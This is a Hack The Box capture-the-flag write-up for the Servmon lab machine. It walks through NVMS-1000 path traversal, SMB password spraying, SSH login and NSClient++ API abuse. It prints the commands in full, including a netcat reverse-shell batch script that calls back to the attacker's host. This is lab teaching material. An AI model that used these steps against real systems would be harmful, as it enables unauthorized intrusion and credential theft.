Hi! Let’s go for another writeup from Hack The Box, Servmon machine, level easy. It’s a Windows machine and below there is a recon by nmap:
root@hackthebox:~# nmap -sS -p- -O 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 23:48 -03
Nmap scan report for servmon (10.10.10.184)
Host is up (0.13s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
7680/tcp open pando-pub
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/7%OT=21%CT=1%CU=34019%PV=Y%DS=2%DC=I%G=Y%TM=5EB37A77
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=U)
OS:OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O
OS:6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF
OS:=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=8
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 864.42 seconds
There is a lot of services available and that is a good thing. By enumerating main services:
- 21 FTP
- 22 SSH
- 445 SMB Share
- 80 HTTP (NVMS ???)
- 8443 HTTPS (Nagios Web Config)
- 5666 NRPE (Nagios Agent)
Let’s start with FTP. The first thing in FTP service is checking if Anonymous user are available (with no password).
root@hackthebox:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.
Nice! We’re in. There is a directory labeled Users. Inside it has two directory: Nadine and Nathan:
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
226 Transfer complete.
Inside of Nadine directory has text file called Confidential.txt saying:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
And Nathan directory has another text file called Notes to do.txt saying:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
We have some tips here, let’s unite them:
- In Nathan’s Desktop directory has a file called
Passwords.txt. - Only two tasks were made by Nathan, so access to NVMS are available.
- What is NVMS?
- We confirmed that NSClient is available on the host and it will be useful later
What is NVMS?. By accessing port 80, I saw this login screen:
At first search on Google, it told me that NVMS-1000 is a DVR (Digital Video Recorder), so I’ve searched for some vulnerability about it and I found this. It’s a script that exploits a path traversal on NVMS-1000 web configuration. By using this script, let’s try to read that Nathan’s file Passwords.txt:
root@hackthebox:# ./nvms.py 10.10.10.184 /users/nathan/desktop/passwords.txt
[+] DT Attack Succeeded
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
Now I have two users and 7 passwords that I can try out. I made a script using SMB protocol to test each user and password:
- Nathan
root@hackthebox:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nathan%$i -L //10.10.10.184/; done 1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE L1k3B1gBut7s@W0rk => session setup failed: NT_STATUS_LOGON_FAILURE 0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURENone of this passwords belongs to Nathan.
- Nadine
root@hackthebox:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nadine%$i -L //10.10.10.184/; done 1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE L1k3B1gBut7s@W0rk => Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available 0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILUREHey! User
Nadinehas passwordL1k3B1gBut7s@W0rk. I spent my time tryingpsexec,wmiexec,smbexecand none of them worked. However, I forgot about my first recon: there is SSH service running on host. OK then:
root@hackthebox:~# ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
[REDACTED]
I’ve just owned user. Now I have to escalate privileges. By making the recon over the host and searching for some admin’s privileges, Nadine user has no specific privilege at all. I have to find another way to escalate privileges. Then I remembered about NSClient running on host. By searching for exploit for NSClient, here teaches how to escalate privileges by web configuration interface. OK, I tried to follow this tutorial getting the password at \Program Files\NSClient++\nsclient.ini and I tried to logon in NSClient web configuration in port 8443, but it didn’t work. When I came back on Nadine’s checklist in FTP, I saw that NSClient access was locked and nsclient.ini confirmed this:
nadine@SERVMON C:\Users\Nadine>type "\Program Files\NSClient++\nsclient.ini"
...
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
...
Now what? I spent my time again wondering that should I had to do. Then I decided to start from begining: reading the NSClient++ docs! By reading at first glance, I noticed this:
There is an API! In my hand I have password admin located at nsclient.ini. By according with this manual, that’s the way how to authenticate and access NSClient++ API:
curl -s -k -u admin https://localhost:8443/api/v1/info
But I didn’t have curl in Windows. I had to download it here, decompressed it and sent the curl directory via SSH into Nadine user. If everything worked well, the output will looks like this:
{"name":"NSClient++","version":"0.5.2.35 2018-01-28","version_url":"https://localhost:8443/api/v1/info/version"}
By following here, the next steps are:
- Create script to reverse shell
- Register script into
NSClient++ - Force to run this script registered into
NSClient++(somehow)
The script needs to connect to my host when called by NSClient++, but how it will connect? There so many ways to do this and I chose NetCat, but you can choose Powershell, Python, Lua… NSClient++ supports all of these languages. Pick one!
Getting back, I’ve downloaded NetCat for Windows and sent it:
root@hackthebox:~# scp nc.exe [email protected]:/temp
I made this batch script below to register in NSClient++ called evil.bat:
@echo off
c:\temp\nc.exe 10.10.13.13 4444 -e cmd.exe
And sent it via SSH:
root@hackthebox:~# scp evil.bat [email protected]:/users/nadine/Desktop
Alright! It’s time to register this script into NSClient++. By reading more NSClient++ document and learning more about its API, I found this section and I could register my script:
nadine@SERVMON C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
Added evil as scripts\evil.bat
The last step is force NSClient++ to run my malicious script, according with this section, but before this, I had to prepare my host to listen this specific connection:
root@hackthebox:~# nc -lvp 4444
listening on [any] 4444...
Now I force running my script:
nadine@SERVMON C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/queries/evil/commands/execute
Checking my terminal listening to port 4444:
root@hackthebox:~# nc -lvp 4444
listening on [any] 4444...
connect to [10.10.13.13] from servmon [10.10.10.184] 49733
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>
Game over!